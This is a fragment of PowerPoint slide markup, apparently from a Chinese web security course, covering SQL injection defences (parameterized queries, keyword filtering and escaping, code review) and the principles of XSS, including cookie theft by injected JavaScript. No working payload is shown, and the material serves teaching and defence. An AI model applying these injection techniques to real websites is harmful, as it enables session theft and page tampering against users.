                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>使用参数化查询的方式来创建</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQ</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>对参数进行关键字过滤，如表所示。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>对关键字进行转义。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1150">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" marR="155575">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>参数关</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-10" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>键</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>字</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>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3</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161544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SQ</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入的防范措施</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715397" y="861360"/>
            <a:ext cx="3347085" cy="393065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="33655" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="265"/>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在代码审查中查找</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341630" marR="5080" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="275"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码审查时，注意查找程序代码中的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入漏洞，不同的编程语言可能存 在的注入漏洞的点也不同</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2384939" y="2653446"/>
            <a:ext cx="85090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不同编</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>程语言的关键字</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1735466" y="1202309"/>
            <a:ext cx="2161794" cy="1491996"/>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027" y="907541"/>
            <a:ext cx="4371975" cy="2453005"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:ln w="12953">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900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="420370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2550" spc="15">
                <a:solidFill>
                  <a:srgbClr val="EFEDE3"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2550" spc="35">
                <a:solidFill>
                  <a:srgbClr val="EFEDE3"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>跨站脚本漏洞</a:t>
            </a:r>
            <a:endParaRPr sz="2550">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>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5"/>
            <a:ext cx="3373754" cy="777875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="93980" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="7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原理解析</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>可以用来获取用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、改变网页内</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>容</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、</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调转等</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>存</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>在</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漏 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞的网站，就可能会被盗取用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Cook</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、黑掉页面、导航到恶意网站</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，而攻击 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>者需要做的仅仅是利用网页开发时留下的漏</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，通过巧妙的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>向</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页面中注 入恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>码</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2259971" y="3201451"/>
            <a:ext cx="493395" cy="124460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="12065" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>击过程</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182255" y="1888236"/>
            <a:ext cx="2766060" cy="1258823"/>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181493" y="1887473"/>
            <a:ext cx="2767965" cy="1260475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2767965" h="1260475">
                <a:moveTo>
                  <a:pt x="0" y="1260348"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2767583" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2767583" y="1260348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1260348"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>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621993"/>
            <a:ext cx="1061085" cy="245110"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">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原理解析</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="864270"/>
            <a:ext cx="3383915" cy="316865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="38735" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="77700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="305"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下面是一段简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>漏洞实例，其代码功能是接收用户在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>页面中提交的数 据，再将数据显示在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>PrintStr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>页面。</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="203835">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="155">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>页面代码如：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454029" y="1417112"/>
            <a:ext cx="614045"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145">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
